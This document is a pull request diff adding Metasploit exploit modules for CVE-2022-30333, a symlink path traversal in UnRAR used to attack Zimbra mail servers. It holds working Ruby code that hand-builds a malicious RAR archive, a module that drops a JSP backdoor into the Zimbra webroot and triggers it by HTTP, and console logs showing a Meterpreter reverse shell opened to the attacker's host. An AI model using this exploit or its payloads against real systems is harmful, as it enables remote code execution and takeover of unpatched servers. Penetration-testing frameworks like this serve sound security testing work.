### PR TITLE
Add in exploit for CVE-2022-30333 - path traversal vulnerability in RARLAB UnRAR < 6.12

### DIFF
--- a/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md
+++ b/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md
@@ -5,113 +5,58 @@ This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 
 * [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
 * [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
 
-Zimbra is included as a specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra are affected:
-
-* Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
-* Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
-
-Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra:
-
-```
-$ apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18
-$ zmcontrol -v
-Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1.
-```
-
-Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work.
+This module creates a generic RAR file containing whatever `PAYLOAD` the user configured.
 
 ## Verification Steps
 
-To exploit Zimbra:
+To generate the .rar file:
 
 ```
 msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
-[*] Using configured payload linux/x64/meterpreter/reverse_tcp
-msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
-LHOST => 10.0.0.146
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
 RHOSTS => 10.0.0.154
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../tmp/docstest.txt
+TARGET_PATH => ../../../../../../tmp/docstest.txt
 msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
 
-[*] Started reverse TCP handler on 10.0.0.146:4444
-[*] Encoding the payload as a .jsp file
-[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp
-[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
-[+] File created! Email the file above to any user on the target Zimbra server
-[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
-[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
-[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
-[*] Sending stage (3020772 bytes) to 10.0.0.154
-[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp
-[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:51664) at 2022-07-20 13:33:25 -0700
-
-meterpreter > getuid
-Server username: zimbra
-```
-
-To generate a generic .rar file:
-
-```
-msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET 1
-TARGET => 1
-msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH '../../../../../../../../../tmp'
-TARGET_PATH => ../../../../../../../../../tmp
-msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_EXTENSION 'elf'
-TARGET_EXTENSION => elf
-msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
-
-[*] Target filename: ../../../../../../../../../tmp/hftb.elf
+[*] Target filename: ../../../../../../tmp/docstest.txt
 [+] payload.rar stored at /home/ron/.msf4/local/payload.rar
 ```
 
-(then, in a shell with a vulnerable version of unrar)
+Then, with a vulnerable versions of UnRAR (see the link above), extract it:
 
 ```
-ron@fedora ~/tools/unrar $ ./unrar x ~/.msf4/local/payload.rar
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ./unrar x -o+ ~/.msf4/local/payload.rar
+
 UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
 
 Extracting from /home/ron/.msf4/local/payload.rar
 
-Extracting  ZEnFEoDkBpQZ                                              OK
-Extracting  ZEnFEoDkBpQZ                                              OK
+Extracting  hhgdzigwkgv                                               OK 
+Extracting  hhgdzigwkgv                                               OK 
 All OK
-ron@fedora ~/tools/unrar $ file /tmp/hftb.elf
-/tmp/hftb.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ls -l hhgdzigwkgv 
+lrwxrwxrwx. 1 ron games 34 Jul 27 13:04 hhgdzigwkgv -> ../../../../../../tmp/docstest.txt
+
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ file /tmp/docstest.txt
+/tmp/docstest.txt: data
 ```
 
 ## Options
 
 ### `FILENAME`
 
-The filename to generate
+The filename to generate, typically it's `payload.rar` and that works fine.
 
 ### `TARGET_PATH`
 
-The path (traversal included) where the payload will extract to - eg, `../../../tmp/target.txt`
-
-### `TARGET_FILENAME` / `TARGET_EXTENSION`
-
-The filename and extension for the payload.
-
-The logic of both is:
-
-* We want to randomize the `TARGET_FILENAME`, but...
-* The Zimbra exploit requires a `.jsp` extension to work
-
-To have a random filename but a specific extension, my best idea is to have two separate options.
-
-### `EncodeAsJsp`
-
-If set to `true`, encode the payload into .jsp format. This makes it possible to exploit Zimbra.
-
-### `ListenerTimeout`
-
-The number of seconds to wait for a new session (default = `0`, or infinite).
-
-### `CheckInterval`
-
-The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path.
+The path, including traversal characters (`../`) and the filename. The slashes' direction doesn't matter, that gets fixed in the module.
 
 ## Scenarios
 
-The most common examples are listed above in "Verification Steps".
+This is a pretty generic exploit that can be used against any software with a bad version of UnRAR.
+
+We also built a specific exploit for Zimbra - `exploit/linux/http/zimbra_unrar_cve_2022_30333`.

--- a/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md
+++ b/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md
@@ -1,0 +1,117 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+Zimbra is included as a specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra are affected:
+
+* Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+* Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra:
+
+```
+$ apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18
+$ zmcontrol -v
+Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1.
+```
+
+Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work.
+
+## Verification Steps
+
+To exploit Zimbra:
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+[+] File created! Email the file above to any user on the target Zimbra server
+[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
+[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
+[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
+[*] Sending stage (3020772 bytes) to 10.0.0.154
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:51664) at 2022-07-20 13:33:25 -0700
+
+meterpreter > getuid
+Server username: zimbra
+```
+
+To generate a generic .rar file:
+
+```
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH '../../../../../../../../../tmp'
+TARGET_PATH => ../../../../../../../../../tmp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_EXTENSION 'elf'
+TARGET_EXTENSION => elf
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../../../../tmp/hftb.elf
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+(then, in a shell with a vulnerable version of unrar)
+
+```
+ron@fedora ~/tools/unrar $ ./unrar x ~/.msf4/local/payload.rar
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+Extracting from /home/ron/.msf4/local/payload.rar
+
+Extracting  ZEnFEoDkBpQZ                                              OK
+Extracting  ZEnFEoDkBpQZ                                              OK
+All OK
+ron@fedora ~/tools/unrar $ file /tmp/hftb.elf
+/tmp/hftb.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to - eg, `../../../tmp/target.txt`
+
+### `TARGET_FILENAME` / `TARGET_EXTENSION`
+
+The filename and extension for the payload.
+
+The logic of both is:
+
+* We want to randomize the `TARGET_FILENAME`, but...
+* The Zimbra exploit requires a `.jsp` extension to work
+
+To have a random filename but a specific extension, my best idea is to have two separate options.
+
+### `EncodeAsJsp`
+
+If set to `true`, encode the payload into .jsp format. This makes it possible to exploit Zimbra.
+
+### `ListenerTimeout`
+
+The number of seconds to wait for a new session (default = `0`, or infinite).
+
+### `CheckInterval`
+
+The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path.
+
+## Scenarios
+
+The most common examples are listed above in "Verification Steps".

--- a/documentation/modules/exploit/linux/http/zimbra_unrar_cve_2022_30333.md
+++ b/documentation/modules/exploit/linux/http/zimbra_unrar_cve_2022_30333.md
@@ -1,0 +1,92 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier) on Zimbra. You can get the vulnerable version of `unrar` here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+Zimbra is the specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra, assuming the vulnerable version of `unrar` is installed, are affected:
+
+* Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+* Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra from the current version:
+
+```
+# apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18
+# reboot
+```
+
+And to verify:
+
+```
+$ sudo -u zimbra /opt/zimbra/bin/zmcontrol -v
+Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1.
+```
+
+Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work.
+
+## Verification Steps
+
+To exploit Zimbra, first load the module and generate the .rar file:
+
+```
+msf6 > use exploit/linux/http/zimbra_unrar_cve_2022_30333
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+[+] File created! Email the file above to any user on the target Zimbra server
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[...] waiting [...]
+```
+
+Then, email that file to any user (including a non-existent mailbox) on the Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract it to check for malware with no user interaction. Metasploit should see the malicious file extracted and get a session:
+
+```
+[...]
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Sending stage (3020772 bytes) to 10.0.0.154
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:39710) at 2022-07-27 13:18:03 -0700
+
+meterpreter > getuid
+Server username: zimbra
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate - defaults to `payload.rar`, but can be changed on the filesystem or whatever.
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `TRIGGER_PAYLOAD`
+
+A boolean, default `true`, that determines whether we use HTTP requests to trigger the .jsp payload. Set to `false` to trigger the payload manually.
+
+### `ListenerTimeout`
+
+The number of seconds to wait for a new session (default = `0`, or infinite).
+
+### `CheckInterval`
+
+The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path.

--- a/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
+++ b/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
@@ -14,11 +14,13 @@ module Msf
         # Encode arbitrary data to be extracted to an arbitrary path on versions of
         # unrar that are affected by CVE-2022-30333
         def encode_as_traversal_rar(symlink_name, target_path, data)
-          unless target_path.length < 0x68
+          # Exactly 104 characters isn't allowed because we need to null-terminate
+          unless target_path.length < 104
             print_error 'The RAR filename target is too long (max length: 103 characters)'
             return nil
           end
 
+          # Data and symlink_name don't need to be null-terminated, just padded
           unless data.length <= 4096
             print_error "The RAR file data is too long (max length: 4096 bytes, it was #{data.length})"
             return nil
@@ -31,13 +33,13 @@ module Msf
 
           # Null terminate the path, pad with NUL bytes, and invert the slashes
           symlink_target = (target_path + "\0").gsub('/', '\\')
-          symlink_target.concat(rand(255).chr) while symlink_target.length < 0x68
+          symlink_target.concat(rand(255).chr) while symlink_target.length < 104
 
           symlink_name = symlink_name.ljust(12, "\0")
 
           # Pad the data to the full length
           while data.length < 4096
-            data.concat(rand(255).chr) # TODO
+            data.concat(rand(255).chr)
           end
 
           # Build a RAR file from pieces, filling in the blanks with our payloads.

--- a/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
+++ b/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
@@ -1,0 +1,75 @@
+# Encoding: ASCII-8BIT
+
+module Msf
+  class Exploit
+    module Format
+      # The RarSymlinkPathTraversal mixin provides methods for generating a RAR file
+      # that exploits CVE-2022-30333, which can write an arbitrary file to an arbitrary
+      # location on a Linux filesystem
+      module RarSymlinkPathTraversal
+        def initialize(info = {})
+          super
+        end
+
+        # Encode arbitrary data to be extracted to an arbitrary path on versions of
+        # unrar that are affected by CVE-2022-30333
+        def encode_as_traversal_rar(symlink_name, target_path, data)
+          unless target_path.length < 0x68
+            print_error 'The RAR filename target is too long (max length: 103 characters)'
+            return nil
+          end
+
+          unless data.length <= 4096
+            print_error "The RAR file data is too long (max length: 4096 bytes, it was #{data.length})"
+            return nil
+          end
+
+          unless symlink_name.length <= 12
+            print_error 'The symlink is too long (max length: 12 characters)'
+            return nil
+          end
+
+          # Null terminate the path, pad with NUL bytes, and invert the slashes
+          symlink_target = (target_path + "\0").gsub('/', '\\')
+          symlink_target.concat(rand(255).chr) while symlink_target.length < 0x68
+
+          symlink_name = symlink_name.ljust(12, "\0")
+
+          # Pad the data to the full length
+          while data.length < 4096
+            data.concat(rand(255).chr) # TODO
+          end
+
+          # Build a RAR file from pieces, filling in the blanks with our payloads.
+          # The RAR format is non-free (and complex), so this is the easiest way to
+          # build a payload file
+          rar = "\x52\x61\x72\x21\x1a\x07\x01\x00\xf3\xe1\x82\xeb\x0b\x01\x05\x07\x00\x06\x01\x01\x80\x80\x80\x00"
+
+          # Create the first section (with the symlink), and attach with its CRC32
+          rar_section1 = ''
+          rar_section1.concat("\x94\x01\x02\x03\x78\x00\x04\x00\xa0\x08\x00\x00\x00\x00\x80\x00\x00\x0c")
+          rar_section1.concat(symlink_name) # Symlink filename
+          rar_section1.concat("\x0a\x03\x02\xae\xf0\x37\x1c\x91\x98\xd8\x01\x6c\x05\x02\x00\x68")
+          rar_section1.concat(symlink_target)
+          rar.concat([Zlib.crc32(rar_section1), rar_section1].pack('Va*'))
+
+          # Create the second section (with the data), and attach with its CRC32
+          rar_section2 = ''
+          rar_section2.concat("\x28\x02\x03\x0b\x80\x20\x04\x80\x20\x20")
+          rar_section2.concat([Zlib.crc32(data)].pack('V'))
+          rar_section2.concat("\x80\x00\x00\x0c")
+          rar_section2.concat(symlink_name) # Data filename (same as symlink to overwrite it)
+          rar_section2.concat("\x0a\x03\x02\x00\x36\xe3\x00\x91\x98\xd8\x01")
+          rar.concat([Zlib.crc32(rar_section2), rar_section2].pack('Va*'))
+
+          rar.concat(data)
+
+          # This tail doesn't seem necessary, but I don't want to mess with it
+          rar.concat("\x1d\x77\x56\x51\x03\x05\x04\x00")
+
+          rar
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
+++ b/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
@@ -35,9 +35,7 @@ module Msf
           symlink_name = symlink_name.ljust(12, "\0")
 
           # Pad the data to the full length
-          while data.length < 4096
-            data.concat(rand(255).chr)
-          end
+          data.concat(rand(255).chr) while data.length < 4096
 
           # Build a RAR file from pieces, filling in the blanks with our payloads.
           # The RAR format is non-free (and complex), so this is the easiest way to

--- a/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
+++ b/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
@@ -16,19 +16,16 @@ module Msf
         def encode_as_traversal_rar(symlink_name, target_path, data)
           # Exactly 104 characters isn't allowed because we need to null-terminate
           unless target_path.length < 104
-            print_error 'The RAR filename target is too long (max length: 103 characters)'
-            return nil
+            raise ArgumentError, 'The RAR filename target is too long (max length: 103 characters)'
           end
 
           # Data and symlink_name don't need to be null-terminated, just padded
           unless data.length <= 4096
-            print_error "The RAR file data is too long (max length: 4096 bytes, it was #{data.length})"
-            return nil
+            raise ArgumentError, "The RAR file data is too long (max length: 4096 bytes, it was #{data.length})"
           end
 
           unless symlink_name.length <= 12
-            print_error 'The symlink is too long (max length: 12 characters)'
-            return nil
+            raise ArgumentError, 'The symlink is too long (max length: 12 characters)'
           end
 
           # Null terminate the path, pad with NUL bytes, and invert the slashes

--- a/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
+++ b/lib/msf/core/exploit/format/rar_symlink_path_traversal.rb
@@ -7,10 +7,6 @@ module Msf
       # that exploits CVE-2022-30333, which can write an arbitrary file to an arbitrary
       # location on a Linux filesystem
       module RarSymlinkPathTraversal
-        def initialize(info = {})
-          super
-        end
-
         # Encode arbitrary data to be extracted to an arbitrary path on versions of
         # unrar that are affected by CVE-2022-30333
         def encode_as_traversal_rar(symlink_name, target_path, data)

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload.encoded)
     rescue StandardError => e
-      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e.to_s}")
+      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
     end
 
     file_create(rar)

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -1,0 +1,225 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',
+        'Description' => %q{
+          This module creates a RAR file that exploits CVE-2022-30333, which is a
+          path-traversal vulnerability in unRAR that can extract an arbitrary file
+          to an arbitrary location on a Linux system.
+
+          The core issue is that when a symbolic link is unRAR'ed, Windows
+          symbolic links are not properly validated on Linux systems and can
+          therefore write a symbolic link that points anywhere on the filesystem.
+          If a second file in the archive has the same name, it will be written
+          to the symbolic link path.
+
+          The Zimbra target creates a RAR file that can exploit the following
+          versions of Zimbra Collaboration:
+
+          * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+          * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+        },
+        'Author' => [
+          'Simon Scannell', # Discovery / initial disclosure (via Sonar)
+          'Ron Bowes', # Analysis, PoC, and module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-30333'],
+          ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],
+          ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Payload' => {
+          # The RAR file has 4096 bytes of room. The payload is hex-encoded, and
+          # the template is ~1624 bytes long (with worst possible RNG).
+          'Space' => (4096 / 2) - 1700
+        },
+        'Targets' => [
+          [
+            'Zimbra Collaboration Suite',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_JAVA],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+
+                'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
+                'TARGET_FILENAME' => nil,
+                'TARGET_EXTENSION' => 'jsp',
+                'DisablePayloadHandler' => false,
+                'RPORT' => 443,
+                'SSL' => true,
+                'EncodeAsJsp' => true
+              }
+            },
+          ],
+          [
+            'Generic RAR file',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_JAVA],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true,
+                'TARGET_PATH' => nil,
+                'TARGET_FILENAME' => nil,
+                'TARGET_EXTENSION' => nil,
+                'AllowNoCleanup' => true,
+                'EncodeAsJsp' => false
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2022-06-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
+
+        # Separating the path, filename, and extension allows us to randomize the filename
+        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").', nil]),
+        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory (default: random).', nil]),
+        OptString.new('TARGET_EXTENSION', [ false, 'The extension to add to the filename (default: no extension).', nil]),
+        OptString.new('EncodeAsJsp', [ false, 'Encode the payload as a .jsp file?', false])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        # Took this from multi/handler
+        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
+        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait while checking for the payload.', 5 ])
+      ]
+    )
+  end
+
+  # Generate an on-system filename using datastore options
+  def generate_target_filename
+    target_filename = File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10))
+
+    return target_filename unless datastore['TARGET_EXTENSION']
+
+    "#{target_filename}.#{datastore['TARGET_EXTENSION']}"
+  end
+
+  # Normalize the path traversal and figure out where it is relative to the web root
+  def zimbra_get_public_path(target_filename)
+    # Normalize the path
+    normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath
+
+    # Figure out where it is, relative to the webroot
+    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
+    relative_path = normalized_path.relative_path_from(webroot)
+
+    # Hopefully, we found a path from the webroot to the payload!
+    if relative_path.to_s.start_with?('../')
+      print_warning('Could not determine the public web path, disabling payload triggering')
+      return nil
+    end
+
+    return relative_path
+  end
+
+  def encode_as_rar(target_path, data)
+    unless target_path.length < 0x68
+      fail_with(Failure::BadConfig, 'The configured TARGET_PATH is too long (max length: 103 characters)')
+    end
+
+    unless data.length < 4096
+      fail_with(Failure::BadConfig, "The payload is too long (max length: 4096 bytes, it was #{data.length})")
+    end
+
+    # Null terminate the path, pad with NUL bytes, and invert the slashes
+    symlink_target = (target_path + "\0").gsub('/', '\\').ljust(0x68, "\0")
+    symlink_name = rand_text_alpha(12)
+
+    # NULL-Pad the data as well
+    data = data.ljust(4096, "\0")
+
+    # Build a RAR file from pieces, filling in the blanks with our payloads.
+    # The RAR format is non-free (and complex), so this is the easiest way to
+    # build a payload file
+    "\x52\x61\x72\x21\x1a\x07\x01\x00\xf3\xe1\x82\xeb\x0b\x01\x05\x07\x00\x06\x01\x01\x80\x80\x80\x00\x9e\xe2\xc4\xf5\x94\x01\x02\x03\x78\x00\x04\x00\xa0\x08\x00\x00\x00\x00\x80\x00\x00\x0c" +
+      symlink_name + # Symlink filename
+      "\x0a\x03\x02\xae\xf0\x37\x1c\x91\x98\xd8\x01\x6c\x05\x02\x00\x68" +
+      symlink_target +
+      "\xf3\xa1\x93\x68\x28\x02\x03\x0b\x80\x20\x04\x80\x20\x20" +
+      [Zlib.crc32(data)].pack('V') +
+      "\x80\x00\x00\x0c" +
+      symlink_name + # Data filename (same as symlink to overwrite it)
+      "\x0a\x03\x02\x00\x36\xe3\x00\x91\x98\xd8\x01" +
+      data +
+      "\x1d\x77\x56\x51\x03\x05\x04\x00"
+  end
+
+  def exploit
+    payload = generate_payload_exe
+
+    if datastore['EncodeAsJsp']
+      print_status('Encoding the payload as a .jsp file')
+      payload = Msf::Util::EXE.to_jsp(payload)
+    end
+
+    # Create a file
+    target_filename = generate_target_filename
+    print_status("Target filename: #{target_filename}")
+    file_create(encode_as_rar(target_filename, payload))
+
+    # If it's Zimbra, try to trigger the payload
+    if target.name == 'Zimbra Collaboration Suite'
+      print_good('File created! Email the file above to any user on the target Zimbra server')
+
+      # Get the public path for triggering the vulnerability, terminate if we
+      # can't figure it out
+      public_filename = zimbra_get_public_path(target_filename)
+      return if public_filename.nil?
+
+      register_file_for_cleanup(target_filename)
+
+      # This loop is mostly from `multi/handler`
+      stime = Time.now.to_f
+      timeout = datastore['ListenerTimeout'].to_i
+      loop do
+        break if session_created?
+        break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+        print_status("Trying to trigger the backdoor @ #{public_filename}...")
+
+        res = send_request_cgi(
+          'method' => 'GET',
+          'uri' => normalize_uri(public_filename)
+        )
+
+        unless res
+          fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
+        end
+
+        Rex::ThreadSafe.sleep(datastore['CheckInterval'].to_i)
+      end
+    end
+  end
+end

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -19,7 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module creates a RAR file that exploits CVE-2022-30333, which is a
           path-traversal vulnerability in unRAR that can extract an arbitrary file
-          to an arbitrary location on a Linux system.
+          to an arbitrary location on a Linux system. UnRAR fixed this
+          vulnerability in version 6.12 (open source version 6.1.7).
